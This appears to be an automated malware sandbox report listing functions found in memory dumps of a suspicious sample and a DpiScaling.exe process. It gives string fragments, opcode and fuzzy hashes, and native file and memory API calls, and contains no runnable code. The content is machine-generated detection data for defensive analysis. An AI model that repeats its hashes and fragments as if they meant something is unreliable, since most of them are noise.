String ID: $$%$*$+U$,$0$3$3|$4H$5?$6$7$7+$;$A$CY$K$KS$Lg$Q/$S>$T$U$Y$Z^$\$_$_S$b0$d$e$hn$k$y8${$r$w
API String ID: 0-1317697018
Opcode ID: 58a737f033e178fa434bf9401e1fe6fcb8e63e95e2f8620633ee031a714b5e99
Instruction ID: ca4404ec50b6f46078c9cab395bb1395940635b5e40c68b5708ffabe299590d9
Opcode Fuzzy Hash: 58a737f033e178fa434bf9401e1fe6fcb8e63e95e2f8620633ee031a714b5e99
Instruction Fuzzy Hash: 68D106B0C06669CBEB61CF41C9987DEBBB1BB05309F1085D9C55C3A281C7BA1AC9CF95

Function 06939D64 Relevance: 25.1, Strings: 20, Instructions: 56COMMON

Download Yara Rule

Strings

kvik, xrefs: 06939E40
x413, xrefs: 06939E0F
;37q, xrefs: 06939E1D
71<x, xrefs: 06939DA6
kn, xrefs: 06939E6A
aiax, xrefs: 06939DC2
75=w, xrefs: 06939E2B
:14=, xrefs: 06939E4E
mvhx, xrefs: 06939D87
ovkn, xrefs: 06939DFA
llvh, xrefs: 06939E32
mkov, xrefs: 06939E63
mkovkn, xrefs: 06939E87, 06939E96
,wmk, xrefs: 06939DF3
9*1w, xrefs: 06939E5C
449w, xrefs: 06939D7D
vjlh, xrefs: 06939E39
X, xrefs: 06939E77
lvlv, xrefs: 06939DAD
- cx, xrefs: 06939D98

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: ,wmk$- cx$449w$71<x$75=w$9*1w$:14=$;37q$X$aiax$kn$kvik$llvh$lvlv$mkov$mkovkn$mvhx$ovkn$vjlh$x413
API String ID: 0-4274057152
Opcode ID: 3de687177e3aac94a3d5baffdc8074df69b2cfb15907500122dc2732316a1d8a
Instruction ID: 8da2c16c5d01a253a9a1ade94ec182dd1675144a0aa72f0c1aa1d7bb8d31ad50
Opcode Fuzzy Hash: 3de687177e3aac94a3d5baffdc8074df69b2cfb15907500122dc2732316a1d8a
Instruction Fuzzy Hash: 6B311EB5C01258EACB10DFCAD985ADDBF30FB01304FA08588D0547F245DB364A56CF5A

Function 06951A37 Relevance: 16.4, Strings: 13, Instructions: 194COMMON

Download Yara Rule

Strings

x, xrefs: 06951A72
o, xrefs: 06951AA6
r, xrefs: 06951AD0
i, xrefs: 06951A98
s, xrefs: 06951AEC
m, xrefs: 06951AD7
l, xrefs: 06951AE5
P, xrefs: 06951AC2
e, xrefs: 06951A9F
., xrefs: 06951A68
, xrefs: 06951A91
o, xrefs: 06951AC9
F, xrefs: 06951ADE

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: $.$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-392141074
Opcode ID: 7d3bea97d046c9d61d05028bd86ebe0a7da59ffd0f0a4f7018827e6b8a212513
Instruction ID: 771d5c91274532673f3ff2f6b45d2b36a65678ec0b194a8d632bc62b43388443
Opcode Fuzzy Hash: 7d3bea97d046c9d61d05028bd86ebe0a7da59ffd0f0a4f7018827e6b8a212513
Instruction Fuzzy Hash: D17109B1C0031CAADB65EBA4CC41FEEB778BF48700F04459DE528AA540EB725B488FA5

Function 069456BE Relevance: 13.8, Strings: 11, Instructions: 87COMMON

Download Yara Rule

Strings

e, xrefs: 0694571E
l, xrefs: 06945702
w, xrefs: 06945754
D, xrefs: 0694574D
i, xrefs: 06945762
e, xrefs: 06945717
\, xrefs: 069456F4
r, xrefs: 06945710
r, xrefs: 06945709
n, xrefs: 0694575B
x, xrefs: 069456FB

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: 4b15b6aec28626c01576daa7a8fb149f978b1273e5881232895d11ebce647b9a
Instruction ID: 288534be61e318a1deda5d50c1969d16bde93ea665cf88b76301025162c82310
Opcode Fuzzy Hash: 4b15b6aec28626c01576daa7a8fb149f978b1273e5881232895d11ebce647b9a
Instruction Fuzzy Hash: 8E3184B1D11318AAEF90DFD4CC45FEEB7B9AF48704F10815CE6187A580DBB55648CBA4

Function 0693D82E Relevance: 11.3, Strings: 9, Instructions: 47COMMON

Download Yara Rule

Strings

-, xrefs: 0693D851
A, xrefs: 0693D85D
2, xrefs: 0693D861
2, xrefs: 0693D889
:, xrefs: 0693D881
5, xrefs: 0693D87D
N, xrefs: 0693D891
K, xrefs: 0693D88D
), xrefs: 0693D895

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: )$-$2$2$5$:$A$K$N
API String ID: 0-1885458472
Opcode ID: 5f8aaa5e74708bdb68e570e4623655190266997a1599961ab2a2d24b480e4c56
Instruction ID: 560b58d2ad2fce3bc816b0028e00b61d4b901d4e7db037ccb7d06816681c0fb3
Opcode Fuzzy Hash: 5f8aaa5e74708bdb68e570e4623655190266997a1599961ab2a2d24b480e4c56
Instruction Fuzzy Hash: 6821FF60D0C7DADDDB12C7BD84542ADBF715F23224F0882CAD4E56B2D2C279470AC7A6

Function 0693D847 Relevance: 11.3, Strings: 9, Instructions: 40COMMON

Download Yara Rule

Strings

-, xrefs: 0693D851
A, xrefs: 0693D85D
2, xrefs: 0693D861
2, xrefs: 0693D889
:, xrefs: 0693D881
5, xrefs: 0693D87D
N, xrefs: 0693D891
K, xrefs: 0693D88D
), xrefs: 0693D895

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: )$-$2$2$5$:$A$K$N
API String ID: 0-1885458472
Opcode ID: d0601f9ab1c47967b1cd758ceb1f3bf98a6bdf20b3535c81c07a4dadfea1ebd7
Instruction ID: e6d12d0281e41f7f4e951208a5a4351af86c1199da8a4b6ad81c20cd55378b6d
Opcode Fuzzy Hash: d0601f9ab1c47967b1cd758ceb1f3bf98a6bdf20b3535c81c07a4dadfea1ebd7
Instruction Fuzzy Hash: D611BA20D087CADDDB12C7BC84182AEBF715F23224F0883D9D4E12B2D6C2795746D7A6

Function 0694CB63 Relevance: 10.1, Strings: 8, Instructions: 134COMMON

Download Yara Rule

Strings

m, xrefs: 0694CC6E
i, xrefs: 0694CC75
x, xrefs: 0694CBA0
P, xrefs: 0694CC50
o, xrefs: 0694CC5A
e, xrefs: 0694CC7C
r, xrefs: 0694CC64
., xrefs: 0694CB99

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: dadfc6476f8db2607421ad5214359d39040f1289af9a660f2015df92bf2b7102
Instruction ID: 51a22b60ef20cafe379614421073ec7005581f46d36b4c97b6dd6ca38325ca96
Opcode Fuzzy Hash: dadfc6476f8db2607421ad5214359d39040f1289af9a660f2015df92bf2b7102
Instruction Fuzzy Hash: 5E41A6B6C00318BADB91EBA0CC44FEE777CAF95300F00859DA519AB540EBB55B498FA1

Function 0694CD47 Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

7, xrefs: 0694CE1A
-, xrefs: 0694CE0C
3, xrefs: 0694CE13
6, xrefs: 0694CE21

Memory Dump Source

Source File: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, Offset: 06760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6760000_yAMzZKaZoBLE.jbxd

Yara matches

Similarity

API ID:
String ID: -$3$6$7
API String ID: 0-257550262
Opcode ID: 2d7cae6ff41dd83889b1323149c6f3c675bb2170e399b95f76cdf8ccae0b6887
Instruction ID: b2459518c5829b6acbb8bbbe251e49a36fdc4b28d0389dd2fd5005f2f1500701
Opcode Fuzzy Hash: 2d7cae6ff41dd83889b1323149c6f3c675bb2170e399b95f76cdf8ccae0b6887
Instruction Fuzzy Hash: F7312FB1911209BFEB54DBA4CD41FFE77B8EF48304F004559E904AB640E776AA058BE5

Analysis Process: DpiScaling.exePID: 6428, Parent PID: 1680COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	4.4%
Signature Coverage:	1.6%
Total number of Nodes:	436
Total number of Limit Nodes:	71

Executed Functions

Function 00619F00 Relevance: 50.5, Strings: 40, Instructions: 490
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fw, xrefs: 0061A20E
y, xrefs: 0061A0BF
Y, xrefs: 0061A0B5
XK, xrefs: 0061A187
&3, xrefs: 0061A15F
DN, xrefs: 00619F2E
+, xrefs: 0061A097
<, xrefs: 0061A2F0
2, xrefs: 0061A318
w+, xrefs: 0061A284
(, xrefs: 0061A2A0
E&, xrefs: 00619F53
W+, xrefs: 0061A2DF
|?, xrefs: 0061A1DC
B, xrefs: 0061A04F
5?, xrefs: 00619F1A
A, xrefs: 0061A204
sP, xrefs: 0061A123
L6, xrefs: 0061A191
v, xrefs: 00619F89
lK, xrefs: 0061A077
Ei, xrefs: 00619F3F
,}, xrefs: 0061A254
-Y, xrefs: 0061A119
Y~, xrefs: 0061A33F
]>, xrefs: 00619FE7
nT, xrefs: 0061A1F0
hh, xrefs: 0061A10F
aK, xrefs: 0061A28B
E&, xrefs: 0061A484
@, xrefs: 00619F6B
(Y, xrefs: 0061A218
P0, xrefs: 00619FD3
_, xrefs: 0061A55A
}, xrefs: 0061A37A
D[,}, xrefs: 0061A791
g/, xrefs: 0061A0FB
!, xrefs: 0061A370
S>, xrefs: 0061A1A5
R, xrefs: 00619F75

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID:
String ID: ($!$&3$(Y$+$,}$-Y$2$5?$<$@$B$DN$D[,}$E&$E&$Ei$L6$P0$R$S>$W+$XK$Y$Y~$]>$_$aK$fw$g/$hh$lK$nT$sP$v$w+$y$|?$}$A
API String ID: 0-1358121024
Opcode ID: 18e8fea2b4aa399e77531fdd851fdb477ee074870e4244fd81966703a7a8cce3
Instruction ID: f6860d3139050458590fe87737793ccba27295450a4a8265aa66614708d53d46
Opcode Fuzzy Hash: 18e8fea2b4aa399e77531fdd851fdb477ee074870e4244fd81966703a7a8cce3
Instruction Fuzzy Hash: 9452A1B0D06228CBEB64CF44C9987DDBBB2BB48318F2481D9C5496B281CBB95ED5CF45

Function 0062CE10 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0062CEF4
FindNextFileW.KERNELBASE(?,00000010), ref: 0062CF2F
FindClose.KERNELBASE(?), ref: 0062CF3A

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: e0fff48d01ca83a299e8f92a1ed416015e5db7c8ed10122551668788acc4a79d
Instruction ID: efc8fee55ceb5501a8e4aba084418041af80d40cdf3801f7eb3d7dac7e78af9a
Opcode Fuzzy Hash: e0fff48d01ca83a299e8f92a1ed416015e5db7c8ed10122551668788acc4a79d
Instruction Fuzzy Hash: 9031E1B2A00748BBDB60DB60DC85FFF77BEDF44B14F10445CB908A7181DA70AA808BA0

Function 00639970 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00639A6E

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 64c9850bb793b10e7cc8d0b17c17a9476126b1746f6ceaab4ac0b633fa197d51
Instruction ID: aa3efba1ac11fd87d6d191be5a3ea19a43346c52208e903eed8dfe8512555e6b
Opcode Fuzzy Hash: 64c9850bb793b10e7cc8d0b17c17a9476126b1746f6ceaab4ac0b633fa197d51
Instruction Fuzzy Hash: 4931D5B5A05248AFCB54DF98D881EDEB7F9EF8C710F108219F909A7340D770A951CBA5

Function 00639AE0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00639BC3

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: feddcea98b26054401b45a151620d58f2786650cf690945770ff2e71ff95a2b8
Instruction ID: d4e69da91c5eada95a703d2a3156fa4f52a3fdd46a26937966c3f9ba24965d97
Opcode Fuzzy Hash: feddcea98b26054401b45a151620d58f2786650cf690945770ff2e71ff95a2b8
Instruction Fuzzy Hash: 1E3107B5A04248AFCB14DF98D881EDFB7B9EF88710F108209F919A7340D770A8518BA5

Function 00639DD0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(006225DB,?,0063875F,00000000,00000004,00003000,?,?,?,?,?,0063875F,006225DB,?,0063BCDE,0063875F), ref: 00639E95

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: de83c7eb32e2ab8c89bc27249108c7080b41080b659b2d7ef2c1fa28d8a8457f
Instruction ID: c706fa18c541d8cf2caeed87bb2be9e5475303f1781d6443594dee30cb2a0181
Opcode Fuzzy Hash: de83c7eb32e2ab8c89bc27249108c7080b41080b659b2d7ef2c1fa28d8a8457f
Instruction Fuzzy Hash: B1211CB5A04248AFDB10DF98DC81EEFB7B9EF88710F10811DFA4997344D774A9118BA5

Function 00639BD0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 00639C63

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 54dc64f1ed53cf9ba746f52edff0ee2b1e71aaf563035d823c299c140d5a0b69
Instruction ID: 1b2d2bee8c8edac9cd442c4a1aceea179ed1fa642a6ebc3a3a77b2ab9a225e3f
Opcode Fuzzy Hash: 54dc64f1ed53cf9ba746f52edff0ee2b1e71aaf563035d823c299c140d5a0b69
Instruction Fuzzy Hash: 30119A71A00348BFD610EB94DC42FEBB7AEDF89710F008109FA08AB280E67079058BE5

Function 00639C70 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00639CA7

Memory Dump Source

Source File: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_610000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction ID: d828df50b5a740c0a145e30518efbc5c346239dc6b8a45ce3e7015268a639417
Opcode Fuzzy Hash: 126009d24afb20c3db14ebf9b93e98afc2f998a1a0808f16c54d58967ed1d910
Instruction Fuzzy Hash: 61E0463A2043047BC220BA5ADC41FDB77AEDBC6720F008059FA49AB241CA71B91187F5

Function 04854650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0485465A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82af7d836d9419b66ada6083d9e3da1cb015fb9196aceb8ec32f0b093ab072a7
Instruction ID: d99c8d30ff48ef8115d87feefc7dc5ea621ee5646f7e85548c187306e3288fe8
Opcode Fuzzy Hash: 82af7d836d9419b66ada6083d9e3da1cb015fb9196aceb8ec32f0b093ab072a7
Instruction Fuzzy Hash: 939002A16025004661807158480450660059BE1306395C615A55A9560C8618D999926A

Function 04854340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0485434A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d54ef115875975caadd6c725a9e531e10d502fb82ae35b8db41a12d2bd98155
Instruction ID: ab8fa58632fb89bdfebe42719a47d20dc214727552d456606b9462f5ec335f1a
Opcode Fuzzy Hash: 9d54ef115875975caadd6c725a9e531e10d502fb82ae35b8db41a12d2bd98155
Instruction Fuzzy Hash: C090027160680016B1807158488464640059BE0306B55C511E5479554C8A14DA9A5362

Function 04852CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852CAA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ad9f0f652d3e6b2fc5558f57d4a0b9d8b68af84f4cc7f7c54fe54765a132ab4
Instruction ID: 9be30f40a9d7f364dc02a93f6eacd8223a5d1d051e13daa7b13d31e58976214f
Opcode Fuzzy Hash: 6ad9f0f652d3e6b2fc5558f57d4a0b9d8b68af84f4cc7f7c54fe54765a132ab4
Instruction Fuzzy Hash: C990027120240406F1407598540874600058BE0306F55D511AA079555EC665D9D56132

Function 04852C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852C6A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03477a9e43c31d08658741477f64ab9c1e955934825da6b075ffc48138f4fac1
Instruction ID: 4fb9dd708a5add099779549eb834e5e4ee5d3ecac1cff94c24be34538f223f6a
Opcode Fuzzy Hash: 03477a9e43c31d08658741477f64ab9c1e955934825da6b075ffc48138f4fac1
Instruction Fuzzy Hash: AB90027120240846F14071584404B4600058BE0306F55C516A5179654D8615D9957522

Function 04852C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852C7A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9366695d80bf3aa38ddbe3260afa1d2f8aa544d8ef2c5676c3f5bb0dd0ffcdc4
Instruction ID: 5e98ba2cfa5a81bdfb0c8a99bc88068fe653d28393a51470532a0ee19aa8f099
Opcode Fuzzy Hash: 9366695d80bf3aa38ddbe3260afa1d2f8aa544d8ef2c5676c3f5bb0dd0ffcdc4
Instruction Fuzzy Hash: 8390027120248806F1507158840474A00058BD0306F59C911A9479658D8695D9D57122

Function 04852DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852DDA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8085bab75bb39d1c784434892c63b392ef602f9043e344011bbcf7ad55f9e593
Instruction ID: a888a68cf413c2f04c5d80b171b39031b22e94c9638b7ce7ec218a9f7de28ea1
Opcode Fuzzy Hash: 8085bab75bb39d1c784434892c63b392ef602f9043e344011bbcf7ad55f9e593
Instruction Fuzzy Hash: F2900261243441567585B158440460740069BE0246795C512A6469950C8526E99AD622

Function 04852DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852DFA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6a744bdf40e345085901379ee82d29b89705e86703287240f3bfb3d26a8308ee
Instruction ID: d422c3984727dce7eda008dad6e73611c76603f0413ef7d59cd8c14c754909b3
Opcode Fuzzy Hash: 6a744bdf40e345085901379ee82d29b89705e86703287240f3bfb3d26a8308ee
Instruction Fuzzy Hash: E590027120240417F1517158450470700098BD0246F95C912A5479558D9656DA96A122

Function 04852D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852D1A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14de48c839c0c94c08791b37a8b95085324590823dcbe43a244b5d8eafe6299f
Instruction ID: 2db902c0dba0a7d248d8087f382c6c6993051fc306fcff1de79d93a91f64106a
Opcode Fuzzy Hash: 14de48c839c0c94c08791b37a8b95085324590823dcbe43a244b5d8eafe6299f
Instruction Fuzzy Hash: 5990026921340006F1C07158540870A00058BD1207F95D915A506A558CC915D9AD5322

Function 04852D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852D3A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18d0eefd30c3f070f012160ecf209151d65ad881cdf08436271ee231633112e4
Instruction ID: ca467d1f409a7047082df39738e15961ceab6efc8459a8528ddc0655c3567c7d
Opcode Fuzzy Hash: 18d0eefd30c3f070f012160ecf209151d65ad881cdf08436271ee231633112e4
Instruction Fuzzy Hash: FF90026130240007F180715854187064005DBE1306F55D511E5469554CD915D99A5223

Function 04852E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852E8A

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000009.00000002.3911857567.0000000004909000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000490D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3911857567.000000000497E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_47e0000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fc69eb670edaa36df1531ebb636876520bda48323031e9245dcb036afdcf4127
Instruction ID: 44ce6a60dc6cb04e8672b9525fde8a2878c86bff6fa4df3e270285a5ad46fb7f
Opcode Fuzzy Hash: fc69eb670edaa36df1531ebb636876520bda48323031e9245dcb036afdcf4127
Instruction Fuzzy Hash: 7A90026160240506F14171584404716000A8BD0246F95C522A6079555ECA25DAD6A132

Function 04852EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04852EEA

Memory Dump Source

Source File: 00000009.00000002.3911857567.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: true

